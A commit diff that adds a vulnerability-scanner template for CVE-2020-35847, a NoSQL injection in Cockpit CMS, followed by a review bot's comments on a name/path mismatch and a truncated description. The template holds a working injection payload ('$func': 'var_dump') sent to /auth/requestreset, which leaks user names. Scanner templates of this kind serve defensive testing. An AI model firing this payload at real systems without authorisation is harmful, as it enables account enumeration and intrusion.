Add CVE-2020-35847
parent
ccb620bf73
commit
65a7eae942
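--- /dev/null
+++ b/PATH_NOT_SHOWN
@@ -0,0 +1,30 @@
+id: CVE-2020-35847
+
+info:
+  name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword
+  author: dwisiswant0
+  severity: critical
+  description: |
+    resetpassword method of the Auth controller,
+    which is responsible for changing the user password using the reset token.
+  reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
+  tags: cve,cve2020,nosqli,sqli
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/auth/requestreset"
+    headers:
+      Content-Type: application/json
+    body: |
+      {
+        "user": {
+          "$func": "var_dump"
+        }
+      }
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'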
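Review bot: The `info.name` line says the injection is in `/auth/resetpassword`, but the only request in the template is sent to `{{BaseURL}}/auth/requestreset`; either the name or the path is wrong, and a reader triaging a hit cannot tell which endpoint was actually confirmed. The `description` block also starts mid-sentence ("resetpassword method of the Auth controller, ...") — the leading clause that names the affected product and version appears to have been lost, so the description should be completed to state what is vulnerable and that the check is non-destructive (it only inspects the response body). Separately, `matchers-condition: and` with a single regex matcher is a no-op; drop it, or document why it is kept for future matchers. The indentation shown here is reconstructed from the rendered page, so please confirm it against the committed file.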